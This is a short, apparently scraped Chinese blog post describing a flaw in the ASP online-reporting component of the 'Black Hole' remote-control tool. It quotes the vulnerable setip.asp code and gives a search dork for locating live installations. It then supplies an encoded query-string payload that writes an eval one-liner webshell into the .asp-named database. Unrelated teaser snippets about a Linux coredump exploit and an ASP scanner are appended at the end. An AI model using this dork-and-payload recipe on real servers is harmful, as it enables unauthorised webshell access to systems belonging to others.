黑洞的ASP上線系統的乙個漏洞

2021-09-05 05:48:35 字數 976 閱讀 3174

toby57

在預設的情況下,利用該漏洞可得到上線系統所在伺服器的webshell

asp上線系統中儲存上線ip資訊的資料庫的副檔名預設為asp

寫入配置時對引數未作檢查,setip.asp相關**

<%

strip=trim(request.querystring("ip"))

strport=trim(request.querystring("port"))

strtype=trim(request.querystring("type"))

if strtype="0" then

strip=request.servervariables("remote_host")

end if

sql="select * from info where strmark='main'"

rs.open sql,conn,1,3

if not rs.eof or not rs.bof then

rs("stripaddress")=strip

rs("strport")=strport

rs("strtype")=strtype

rs.update

'不要修改下面的反饋字元.否則程式不知道是否更新成功.

response.write "update success!"

else

response.write "update fail!"

end if

set rs=nothing

conn.close

set conn=nothing

以「inurl:setip.asp」為關鍵字找了乙個測試位址 提交

?type=%a9%e0%b0y%ce%db%a0%84%9f%a8%94%b3%ac%9b%a1%c5%a1%d4%a9%cd%90%f7

這樣就插入了eval一句話

ipdat.asp

linux乙個漏洞的分析

程式最早是國外的大佬寫的。這個漏洞的原理非常簡單,就是利用coredump的時候,可以在 etc cron.d目錄下生成core檔案。而在 etc cron.d目錄下的檔案,crontab會定時以指定的使用者許可權來執行。如果在core檔案中,指定使用者許可權是root,那麼 就能夠以我們希望的方式...

乙個用c 寫的掃瞄asp原始碼漏洞的應用程式 2

主要方法 protected void btngo click object sender,system.eventargs e 定義分割符為 char line 定義分割符為 string arrstring strurl.split line 求asp檔案全名 string strfilenam...

乙個用c 寫的掃瞄asp原始碼漏洞的應用程式 續

主要方法 protected void btngo click object sender,system.eventargs e 定義分割符為 char line 定義分割符為 string arrstring strurl.split line 求asp檔案全名 string strfilenam...